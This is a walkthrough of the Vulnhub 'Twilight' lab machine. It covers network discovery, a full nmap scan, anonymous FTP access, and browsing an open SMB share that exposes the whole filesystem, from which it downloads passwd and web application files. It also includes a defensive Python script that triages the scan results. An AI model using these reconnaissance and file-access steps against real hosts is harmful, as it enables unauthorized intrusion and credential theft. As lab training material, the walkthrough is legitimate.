Vulnhub Twilight: detailed walkthrough

Twilight

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.89.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:0c:40:47      1      60  PCS Systemtechnik GmbH
 192.168.56.174  08:00:27:aa:5d:c5      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.174.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.174 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 21:01 EST
Nmap scan report for bogon (192.168.56.174)
Host is up (0.00044s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
|   256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_  256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp    open  smtp        Exim smtpd 4.92
| smtp-commands: twilight Hello bogon [192.168.56.137], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root           35 Jul 16  2020 22253251-65325.twilight
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.174:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, ODBCClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, Support41Auth, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: R[Uvtcq09l5aile3lG^'
|_  Auth Plugin Name: mysql_native_password
8080/tcp  open  http        PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
63525/tcp open  http        PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
MAC Address: 08:00:27:AA:5D:C5 (Oracle VirtualBox virtual NIC)
Service Info: Host: twilight; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m55s, deviation: 2h53m14s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: twilight
|   NetBIOS computer name: TWILIGHT\x00
|   Domain name: \x00
|   FQDN: twilight
|_  System time: 2022-11-12T21:01:47-05:00
|_nbstat: NetBIOS name: TWILIGHT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-13T02:01:58
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds

The target host has quite a few open ports, so each of them is enumerated in turn, starting with the FTP service.
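To turn a scan like the one above into a review checklist, here is an added Python example (not part of the original write-up) that parses Nmap's normal output (-oN) and flags the weak spots a defender would want to fix first: anonymous FTP, a database listening on the network, the same web application on two ports, and SMB accepting guest sessions without enforced signing. The excerpt embedded in the script is a trimmed copy of the output shown above.

```python
import re

# Trimmed copy of the Nmap -oN report shown above, embedded so the script
# runs offline (constructed excerpt; some NSE script lines were omitted).
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd 4.92
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root           35 Jul 16  2020 22253251-65325.twilight
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
63525/tcp open  http        PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
MAC Address: 08:00:27:AA:5D:C5 (Oracle VirtualBox virtual NIC)

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# One PORT line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Parse -oN output into (ports, host_scripts).

    Each port is a dict with port, proto, state, service, version and the
    NSE script lines ('|' prefixed) that follow it. Script lines after
    'Host script results:' go into host_scripts instead.
    """
    ports, host_scripts = [], []
    current, in_host = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results:"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5), "scripts": []}
            ports.append(current)
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()   # drop the NSE tree prefix
            if in_host:
                host_scripts.append(body)
            elif current is not None:
                current["scripts"].append(body)
    return ports, host_scripts


def triage(ports, host_scripts):
    """Return human-readable findings, in scan order, for the weak spots
    visible in this scan: anonymous FTP, an exposed database, the same
    web app listening twice, SMB signing not enforced, SMB guest access."""
    findings, titles = [], {}
    for p in ports:
        if p["state"] != "open":
            continue
        where = f"{p['port']}/{p['proto']}"
        joined = " ".join(p["scripts"])
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in joined:
            findings.append(f"{where}: anonymous FTP login allowed")
        if p["service"] in ("mysql", "postgresql", "ms-sql-s"):
            findings.append(f"{where}: database service reachable from the network")
        for s in p["scripts"]:
            if s.startswith("http-title:"):
                # group ports by page title to spot the same app exposed twice
                titles.setdefault(s.split(":", 1)[1].strip(), []).append(p["port"])
    for title, on_ports in titles.items():
        if len(on_ports) > 1:
            findings.append(f"ports {on_ports}: same web application ({title})")
    host = " ".join(host_scripts)
    if ("message_signing: disabled" in host
            or "Message signing enabled but not required" in host):
        findings.append("SMB: message signing not enforced")
    if "account_used: guest" in host:
        findings.append("SMB: guest session accepted")
    return findings


if __name__ == "__main__":
    for finding in triage(*parse_nmap(NMAP_OUTPUT)):
        print(finding)
```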

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ ftp 192.168.56.174 -P 2121
Connected to 192.168.56.174.
220 pyftpdlib 1.5.6 ready.
Name (192.168.56.174:kali): anonymous
331 Username ok, send password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering extended passive mode (|||59871|).
550 No such file or directory.
ftp> ls 
229 Entering extended passive mode (|||52649|).
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root           35 Jul 16  2020 22253251-65325.twilight
226 Transfer complete.
ftp> get 22253251-65325.twilight
local: 22253251-65325.twilight remote: 22253251-65325.twilight
229 Entering extended passive mode (|||33017|).
125 Data connection already open. Transfer starting.
100% |***********************************************************************************************************************************************************************************************|    35       42.56 KiB/s    00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (39.88 KiB/s)
ftp> quit
221 Goodbye.

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ ls
22253251-65325.twilight  nmap_full_scan

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ cat 22253251-65325.twilight 
Sg?~;
dg
14
  V+Y<(^\4cdUpv7 -N'z2

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ searchsploit pyftpdlib                                     
Exploits: No Results
Shellcodes: No Results

Although the target host allows anonymous FTP access, the share holds only one file. It was downloaded to the local Kali Linux machine and its contents inspected, but its meaning is not yet clear. No public exploit for this FTP software was found either.

Next, the SMB service: a large number of files can be read and downloaded directly without credentials (strange):

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient -L 192.168.56.174
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        WRKSHARE        Disk      Workplace Share. Do not access if not an employee.
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            TWILIGHT

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient //192.168.56.174/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul  8 18:57:09 2020
  ..                                  D        0  Wed Jul  8 18:57:09 2020
  root                                D        0  Thu Jul 16 09:50:46 2020
  run                                 D        0  Sat Nov 12 20:38:46 2022
  lost+found                          D        0  Wed Jul  8 18:08:46 2020
  initrd.img                          N 25814661  Wed Jul  8 18:58:16 2020
  etc                                 D        0  Thu Jul 16 09:54:54 2020
  proc                                D        0  Sat Nov 12 20:38:48 2022
  vmlinuz                             N  5274864  Sun Jun  7 11:42:22 2020
  initrd.img.old                      N 25807574  Wed Jul  8 18:58:02 2020
  opt                                 D        0  Wed Jul  8 18:09:01 2020
  srv                                 D        0  Wed Jul  8 18:09:01 2020
  sys                                 D        0  Sat Nov 12 20:38:39 2022
  lib64                               D        0  Wed Jul  8 18:09:08 2020
  sbin                                D        0  Thu Jul 16 09:53:39 2020
  media                               D        0  Wed Jul  8 18:08:46 2020
  bin                                 D        0  Thu Jul 16 08:22:20 2020
  usr                                 D        0  Wed Jul  8 18:09:01 2020
  lib32                               D        0  Wed Jul  8 18:08:56 2020
  dev                                 D        0  Sat Nov 12 20:38:41 2022
  lib                                 D        0  Wed Jul  8 22:20:29 2020
  vmlinuz.old                         N  5274864  Mon Apr 27 01:05:39 2020
  libx32                              D        0  Wed Jul  8 18:08:56 2020
  home                                D        0  Wed Jul  8 19:15:56 2020
  mnt                                 D        0  Wed Jul  8 18:09:01 2020
  var                                 D        0  Wed Jul  8 20:03:27 2020
  boot                                D        0  Wed Jul  8 19:06:53 2020
  tmp                                 D        0  Sat Nov 12 20:53:41 2022

                7158264 blocks of size 1024. 4447424 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> cd /etc/
smb: \etc\> ls
  .                                   D        0  Thu Jul 16 09:54:54 2020
  ..                                  D        0  Wed Jul  8 18:57:09 2020
  insserv.conf.d                      D        0  Wed Jul  8 22:20:44 2020
  shadow-                             N     1036  Wed Jul  8 22:20:36 2020
  mime.types                          N    24512  Sat Feb  9 07:32:33 2019
  deluser.conf                        N      604  Sun Jun 26 16:00:56 2016
  cron.monthly                        D        0  Wed Jul  8 19:06:17 2020
  hosts.deny                          N      711  Wed Jul  8 21:35:11 2020
  crontab                             N     1042  Fri Oct 11 03:58:52 2019
  udev                                D        0  Wed Jul  8 18:58:03 2020
  profile.d                           D        0  Wed Jul  8 22:20:41 2020
  rpc                                 N      887  Sat Feb  9 21:05:36 2019
  subgid-                             N        0  Wed Jul  8 18:09:32 2020
  cron.weekly                         D        0  Wed Jul  8 19:06:17 2020
  mailcap                             N     2579  Wed Jul  8 21:46:45 2020
  console-setup                       D        0  Wed Jul  8 18:11:00 2020
  hosts.allow                         N      411  Wed Jul  8 21:35:11 2020
  libnl-3                             D        0  Wed Jul  8 19:06:19 2020
  magic.mime                          N      111  Tue Oct 22 15:57:17 2019
  gss                                 D        0  Wed Jul  8 20:03:22 2020
  ufw                                 D        0  Wed Jul  8 21:35:06 2020
  passwd                              N     1594  Thu Jul 16 09:34:39 2020
  hostname                            N        9  Wed Jul  8 18:09:53 2020
  ld.so.cache                         N    28325  Thu Jul 16 08:22:20 2020
  gshadow                             N      706  Wed Jul  8 22:20:36 2020
  rc4.d                               D        0  Wed Jul  8 22:26:59 2020
  ld.so.conf.d                        D        0  Thu Jul 16 08:22:18 2020
  hosts                               N      188  Wed Jul  8 18:09:53 2020
  dpkg                                D        0  Thu Jul 16 08:22:19 2020
  ifplugd                             D        0  Wed Jul  8 19:06:16 2020
  pam.d                               D        0  Wed Jul  8 21:46:36 2020
  ca-certificates                     D        0  Wed Jul  8 20:03:28 2020
  alternatives                        D        0  Thu Jul 16 08:22:20 2020
  protocols                           N     2932  Sat Feb  9 21:05:36 2019
  rc0.d                               D        0  Wed Jul  8 22:26:59 2020
  shadow                              N     1036  Thu Jul 16 09:54:54 2020
  wgetrc                              N     4942  Fri Apr  5 09:36:38 2019
  networks                            N       60  Wed Jul  8 18:09:49 2020
  logrotate.conf                      N      435  Wed Aug 22 03:05:31 2018
  bash.bashrc                         N     1994  Thu Apr 18 00:12:36 2019
  python2.7                           D        0  Wed Jul  8 21:45:56 2020
  mtab                                N        0  Sat Nov 12 21:07:45 2022
  xattr.conf                          N      642  Fri Mar  1 17:03:21 2019
  terminfo                            D        0  Wed Jul  8 18:09:27 2020
  ucf.conf                            N     1260  Fri Dec 14 03:51:14 2018
  ldap                                D        0  Wed Jul  8 20:03:32 2020
  debian_version                      N        5  Sat May  2 06:00:00 2020
  bluetooth                           D        0  Wed Jul  8 19:06:20 2020
  cron.daily                          D        0  Wed Jul  8 21:46:40 2020
  opt                                 D        0  Wed Jul  8 18:09:01 2020
  avahi                               D        0  Wed Jul  8 19:06:27 2020
  subgid                              N       20  Wed Jul  8 19:15:56 2020
  apt                                 D        0  Wed Jul  8 21:57:12 2020
  python3                             D        0  Wed Jul  8 18:10:38 2020
  mailcap.order                       N      449  Sat Feb  9 07:32:33 2019
  email-addresses                     N      312  Wed May 13 12:01:31 2020
  modules                             N      195  Wed Jul  8 18:09:47 2020
  xdg                                 D        0  Wed Jul  8 19:06:17 2020
  default                             D        0  Wed Jul  8 22:26:59 2020
  resolv.conf                         N       25  Thu Jul 16 09:52:50 2020
  initramfs-tools                     D        0  Wed Jul  8 18:10:01 2020
  ppp                                 D        0  Wed Jul  8 21:45:50 2020
  rmt                                 N    60376  Tue Apr 23 12:05:54 2019
  libibverbs.d                        D        0  Wed Jul  8 21:46:34 2020
  calendar                            D        0  Wed Jul  8 18:09:51 2020
  logrotate.d                         D        0  Wed Jul  8 22:20:44 2020
  motd                                N      286  Sat Feb  1 12:09:26 2020
  dhcp                                D        0  Wed Jul  8 18:09:50 2020
  rc3.d                               D        0  Wed Jul  8 22:26:59 2020
  host.conf                           N        9  Mon Aug  7 13:14:09 2006
  tmpfiles.d                          D        0  Wed Jan 29 13:07:53 2020
  group                               N      838  Thu Jul 16 08:43:11 2020
  update-motd.d                       D        0  Wed Jul  8 18:56:28 2020
  wpa_supplicant                      D        0  Wed Jul  8 19:06:28 2020
  dbus-1                              D        0  Wed Jul  8 19:06:03 2020
  issue                               N       27  Sat Feb  1 12:09:26 2020
  securetty                           N     4141  Fri Jul 27 04:07:37 2018
  dictionaries-common                 D        0  Wed Jul  8 19:06:30 2020
  cron.hourly                         D        0  Wed Jul  8 18:09:50 2020
  mailname                            N        9  Wed Jul  8 21:45:57 2020
  rc1.d                               D        0  Wed Jul  8 22:26:59 2020
  timezone                            N       17  Wed Jul  8 18:57:25 2020
  init.d                              D        0  Wed Jul  8 22:26:59 2020
  anacrontab                          N      401  Sun May 19 08:42:01 2019
  bindresvport.blacklist              N      367  Fri Mar  2 15:03:58 2018
  rsyslog.d                           D        0  Tue Feb 26 12:43:39 2019
  nanorc                              N     9278  Tue Jun 11 20:23:23 2019
  kernel-img.conf                     N      144  Wed Jul  8 19:15:54 2020
  discover-modprobe.conf              N      346  Sun Jan 14 16:27:01 2018
  services                            N    18774  Sat Feb  9 21:05:36 2019
  sudoers                             N      669  Wed Jul  8 21:44:33 2020
  lighttpd                            D        0  Thu Jul 16 08:22:15 2020
  subuid-                             N        0  Wed Jul  8 18:09:32 2020
  rc2.d                               D        0  Wed Jul  8 22:26:59 2020
  gai.conf                            N     2584  Wed Aug  1 01:10:47 2018
  vim                                 D        0  Wed Jul  8 18:09:50 2020
  systemd                             D        0  Wed Jul  8 18:56:31 2020
  libaudit.conf                       N      191  Thu Apr 25 10:47:32 2019
  network                             D        0  Wed Jul  8 18:09:51 2020
  rc5.d                               D        0  Wed Jul  8 22:26:59 2020
  iproute2                            D        0  Wed Jul  8 18:09:50 2020
  localtime                           N     3545  Mon Apr 27 06:46:23 2020
  apache2                             D        0  Wed Jul  8 20:03:50 2020
  ssh                                 D        0  Wed Jul  8 21:36:00 2020
  skel                                D        0  Wed Jul  8 18:09:28 2020
  group-                              N      825  Wed Jul  8 21:46:40 2020
  gshadow-                            N      696  Wed Jul  8 21:46:40 2020
  ssl                                 D        0  Wed Jul  8 20:03:32 2020
  netconfig                           N      767  Tue Dec 11 09:41:49 2018
  magic                               N      111  Tue Oct 22 15:57:17 2019
  ld.so.conf                          N       34  Fri Mar  2 15:03:58 2018
  sudoers.d                           D        0  Wed Jul  8 21:44:15 2020
  aliases                             N      198  Wed Jul  8 21:45:57 2020
  X11                                 D        0  Wed Jul  8 21:46:28 2020
  cron.d                              D        0  Wed Jul  8 20:03:32 2020
  modules-load.d                      D        0  Wed Jul  8 18:56:30 2020
  locale.alias                        N     2995  Wed May  1 13:24:19 2019
  .pwd.lock                           H        0  Wed Jul  8 18:09:31 2020
  kernel                              D        0  Wed Jul  8 18:10:01 2020
  fstab                               N      734  Wed Jul  8 18:08:47 2020
  subuid                              N       20  Wed Jul  8 19:15:56 2020
  perl                                D        0  Wed Jul  8 20:03:19 2020
  python                              D        0  Wed Jul  8 21:46:38 2020
  profile                             N      767  Fri Mar  4 06:00:00 2016
  selinux                             D        0  Wed Jul  8 18:09:27 2020
  emacs                               D        0  Wed Jul  8 19:06:05 2020
  sysctl.conf                         N     2351  Thu May 31 05:42:46 2018
  sysctl.d                            D        0  Wed Jul  8 18:56:30 2020
  shells                              N      116  Wed Jul  8 18:09:30 2020
  inputrc                             N     1748  Sat May  5 10:52:46 2018
  security                            D        0  Wed Jul  8 18:09:30 2020
  pam.conf                            N      552  Thu Feb 14 02:08:47 2019
  environment                         N        0  Wed Jul  8 18:09:30 2020
  exim4                               D        0  Wed Jul  8 22:28:45 2020
  samba                               D        0  Thu Jul 16 08:47:24 2020
  debconf.conf                        N     2969  Tue Feb 26 04:30:35 2019
  rc6.d                               D        0  Wed Jul  8 22:26:59 2020
  issue.net                           N       20  Sat Feb  1 12:09:26 2020
  grub.d                              D        0  Wed Jul  8 19:06:44 2020
  os-release                          N      261  Sat May  2 12:39:00 2020
  modprobe.d                          D        0  Sat Feb  9 18:00:31 2019
  login.defs                          N    10477  Fri Jul 27 04:07:37 2018
  rcS.d                               D        0  Wed Jul  8 18:10:58 2020
  mke2fs.conf                         N      812  Thu Jan  9 20:19:57 2020
  passwd-                             N     1579  Wed Jul  8 22:20:36 2020
  apparmor                            D        0  Wed Jul  8 18:10:40 2020
  adduser.conf                        N     2981  Wed Jul  8 18:09:32 2020
  ca-certificates.conf                N     5434  Wed Jul  8 20:03:35 2020
  adjtime                             N       44  Wed Jul  8 19:16:03 2020
  nsswitch.conf                       N      494  Sun Feb 10 11:13:53 2019
  logcheck                            D        0  Wed Jul  8 22:20:36 2020
  php                                 D        0  Wed Jul  8 20:03:30 2020
  fonts                               D        0  Wed Jul 15 21:36:05 2020
  locale.gen                          N     9376  Wed Jul  8 18:09:57 2020
  mysql                               D        0  Wed Jul  8 22:20:47 2020
  machine-id                          N       33  Wed Jul  8 18:09:36 2020
  apparmor.d                          D        0  Wed Jul  8 22:20:44 2020
  rsyslog.conf                        N     1988  Tue Feb 26 12:43:39 2019
  python3.7                           D        0  Wed Jul  8 18:10:03 2020
  discover.conf.d                     D        0  Wed Jul  8 18:58:26 2020
  binfmt.d                            D        0  Wed Jan 29 13:07:53 2020

                7158264 blocks of size 1024. 4447420 blocks available
smb: \etc\> get passwd-
getting file \etc\passwd- of size 1579 as passwd- (771.0 KiloBytes/sec) (average 771.0 KiloBytes/sec)
smb: \etc\> cd ..
smb: \> ls
  .                                   D        0  Wed Jul  8 18:57:09 2020
  ..                                  D        0  Wed Jul  8 18:57:09 2020
  root                                D        0  Thu Jul 16 09:50:46 2020
  run                                 D        0  Sat Nov 12 20:38:46 2022
  lost+found                          D        0  Wed Jul  8 18:08:46 2020
  initrd.img                          N 25814661  Wed Jul  8 18:58:16 2020
  etc                                 D        0  Thu Jul 16 09:54:54 2020
  proc                                D        0  Sat Nov 12 20:38:48 2022
  vmlinuz                             N  5274864  Sun Jun  7 11:42:22 2020
  initrd.img.old                      N 25807574  Wed Jul  8 18:58:02 2020
  opt                                 D        0  Wed Jul  8 18:09:01 2020
  srv                                 D        0  Wed Jul  8 18:09:01 2020
  sys                                 D        0  Sat Nov 12 21:07:45 2022
  lib64                               D        0  Wed Jul  8 18:09:08 2020
  sbin                                D        0  Thu Jul 16 09:53:39 2020
  media                               D        0  Wed Jul  8 18:08:46 2020
  bin                                 D        0  Thu Jul 16 08:22:20 2020
  usr                                 D        0  Wed Jul  8 18:09:01 2020
  lib32                               D        0  Wed Jul  8 18:08:56 2020
  dev                                 D        0  Sat Nov 12 20:38:41 2022
  lib                                 D        0  Wed Jul  8 22:20:29 2020
  vmlinuz.old                         N  5274864  Mon Apr 27 01:05:39 2020
  libx32                              D        0  Wed Jul  8 18:08:56 2020
  home                                D        0  Wed Jul  8 19:15:56 2020
  mnt                                 D        0  Wed Jul  8 18:09:01 2020
  var                                 D        0  Wed Jul  8 20:03:27 2020
  boot                                D        0  Wed Jul  8 19:06:53 2020
  tmp                                 D        0  Sat Nov 12 20:53:41 2022

                7158264 blocks of size 1024. 4447420 blocks available
smb: \> cd /root
smb: \root\> ls
NT_STATUS_ACCESS_DENIED listing \root\*
smb: \root\> cd /var/www/html
smb: \var\www\html\> ls
  .                                   D        0  Thu Jul 16 09:43:26 2020
  ..                                  D        0  Wed Jul 15 21:44:37 2020
  current.php                         N      152  Wed Jul 15 21:58:35 2020
  lang.php                            N       58  Wed Jul 15 22:03:45 2020
  gallery                             D        0  Wed Jul  8 22:31:53 2020
  index.php                           N      228  Wed Jul 15 22:03:51 2020

                7158264 blocks of size 1024. 4447420 blocks available
smb: \var\www\html\> get index.php
getting file \var\www\html\index.php of size 228 as index.php (222.6 KiloBytes/sec) (average 588.2 KiloBytes/sec)
smb: \var\www\html\> get lang.php
getting file \var\www\html\lang.php of size 58 as lang.php (28.3 KiloBytes/sec) (average 364.3 KiloBytes/sec)
smb: \var\www\html\> get current.php
getting file \var\www\html\current.php of size 152 as current.php (74.2 KiloBytes/sec) (average 281.4 KiloBytes/sec)
smb: \var\www\html\> cd gallery
smb: \var\www\html\gallery\> ls
  .                                   D        0  Wed Jul  8 22:31:53 2020
  ..                                  D        0  Thu Jul 16 09:43:26 2020
  maxImageUpload.zip                  N    10854  Tue Dec 28 00:12:23 2010
  readme.txt                          N      534  Wed Mar 19 10:57:58 2008
  thumbnail                           D        0  Wed Jul  8 22:11:42 2020
  original                            D        0  Wed Jul  8 22:32:29 2020
  normal                              D        0  Wed Jul  8 22:11:42 2020
  style                               D        0  Tue Mar 18 11:26:50 2008
  maxImageUpload.class.php            N     8916  Wed Mar 19 10:52:38 2008
  index.php                           N      601  Tue Mar 18 11:31:00 2008

                7158264 blocks of size 1024. 4447420 blocks available
smb: \var\www\html\gallery\> get maxImageUpload.zip
getting file \var\www\html\gallery\maxImageUpload.zip of size 10854 as maxImageUpload.zip (3533.1 KiloBytes/sec) (average 1256.9 KiloBytes/sec)
smb: \var\www\html\gallery\> get readme.txt
getting file \var\www\html\gallery\readme.txt of size 534 as readme.txt (260.7 KiloBytes/sec) (average 1090.9 KiloBytes/sec)
smb: \var\www\html\gallery\> cd original
smb: \var\www\html\gallery\original\> ls
  .                                   D        0  Wed Jul  8 22:32:29 2020
  ..                                  D        0  Wed Jul  8 22:31:53 2020

                7158264 blocks of size 1024. 4447412 blocks available
smb: \var\www\html\gallery\original\> cd ..
smb: \var\www\html\gallery\> cd normal
smb: \var\www\html\gallery\normal\> get maxImageUpload.class.php
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \var\www\html\gallery\normal\maxImageUpload.class.php
smb: \var\www\html\gallery\normal\> cd ..
smb: \var\www\html\gallery\> get maxImageUpload.class.php
getting file \var\www\html\gallery\maxImageUpload.class.php of size 8916 as maxImageUpload.class.php (4353.3 KiloBytes/sec) (average 1557.0 KiloBytes/sec)
smb: \var\www\html\gallery\> cd ..
smb: \var\www\html\> cd ..
smb: \var\www\> cd html
smb: \var\www\html\> ls
  .                                   D        0  Thu Jul 16 09:43:26 2020
  ..                                  D        0  Wed Jul 15 21:44:37 2020
  current.php                         N      152  Wed Jul 15 21:58:35 2020
  lang.php                            N       58  Wed Jul 15 22:03:45 2020
  gallery                             D        0  Wed Jul  8 22:31:53 2020
  index.php                           N      228  Wed Jul 15 22:03:51 2020

                7158264 blocks of size 1024. 4447412 blocks available
smb: \var\www\html\> cd /etc
smb: \etc\> ls
  .                                   D        0  Thu Jul 16 09:54:54 2020
  ..                                  D        0  Wed Jul  8 18:57:09 2020
  insserv.conf.d                      D        0  Wed Jul  8 22:20:44 2020
  shadow-                             N     1036  Wed Jul  8 22:20:36 2020
  mime.types                          N    24512  Sat Feb  9 07:32:33 2019
  deluser.conf                        N      604  Sun Jun 26 16:00:56 2016
  cron.monthly                        D        0  Wed Jul  8 19:06:17 2020
  hosts.deny                          N      711  Wed Jul  8 21:35:11 2020
  crontab                             N     1042  Fri Oct 11 03:58:52 2019
  udev                                D        0  Wed Jul  8 18:58:03 2020
  profile.d                           D        0  Wed Jul  8 22:20:41 2020
  rpc                                 N      887  Sat Feb  9 21:05:36 2019
  subgid-                             N        0  Wed Jul  8 18:09:32 2020
  cron.weekly                         D        0  Wed Jul  8 19:06:17 2020
  mailcap                             N     2579  Wed Jul  8 21:46:45 2020
  console-setup                       D        0  Wed Jul  8 18:11:00 2020
  hosts.allow                         N      411  Wed Jul  8 21:35:11 2020
  libnl-3                             D        0  Wed Jul  8 19:06:19 2020
  magic.mime                          N      111  Tue Oct 22 15:57:17 2019
  gss                                 D        0  Wed Jul  8 20:03:22 2020
  ufw                                 D        0  Wed Jul  8 21:35:06 2020
  passwd                              N     1594  Thu Jul 16 09:34:39 2020
  hostname                            N        9  Wed Jul  8 18:09:53 2020
  ld.so.cache                         N    28325  Thu Jul 16 08:22:20 2020
  gshadow                             N      706  Wed Jul  8 22:20:36 2020
  rc4.d                               D        0  Wed Jul  8 22:26:59 2020
  ld.so.conf.d                        D        0  Thu Jul 16 08:22:18 2020
  hosts                               N      188  Wed Jul  8 18:09:53 2020
  dpkg                                D        0  Thu Jul 16 08:22:19 2020
  ifplugd                             D        0  Wed Jul  8 19:06:16 2020
  pam.d                               D        0  Wed Jul  8 21:46:36 2020
  ca-certificates                     D        0  Wed Jul  8 20:03:28 2020
  alternatives                        D        0  Thu Jul 16 08:22:20 2020
  protocols                           N     2932  Sat Feb  9 21:05:36 2019
  rc0.d                               D        0  Wed Jul  8 22:26:59 2020
  shadow                              N     1036  Thu Jul 16 09:54:54 2020
  wgetrc                              N     4942  Fri Apr  5 09:36:38 2019
  networks                            N       60  Wed Jul  8 18:09:49 2020
  logrotate.conf                      N      435  Wed Aug 22 03:05:31 2018
  bash.bashrc                         N     1994  Thu Apr 18 00:12:36 2019
  python2.7                           D        0  Wed Jul  8 21:45:56 2020
  mtab                                N        0  Sat Nov 12 21:07:45 2022
  xattr.conf                          N      642  Fri Mar  1 17:03:21 2019
  terminfo                            D        0  Wed Jul  8 18:09:27 2020
  ucf.conf                            N     1260  Fri Dec 14 03:51:14 2018
  ldap                                D        0  Wed Jul  8 20:03:32 2020
  debian_version                      N        5  Sat May  2 06:00:00 2020
  bluetooth                           D        0  Wed Jul  8 19:06:20 2020
  cron.daily                          D        0  Wed Jul  8 21:46:40 2020
  opt                                 D        0  Wed Jul  8 18:09:01 2020
  avahi                               D        0  Wed Jul  8 19:06:27 2020
  subgid                              N       20  Wed Jul  8 19:15:56 2020
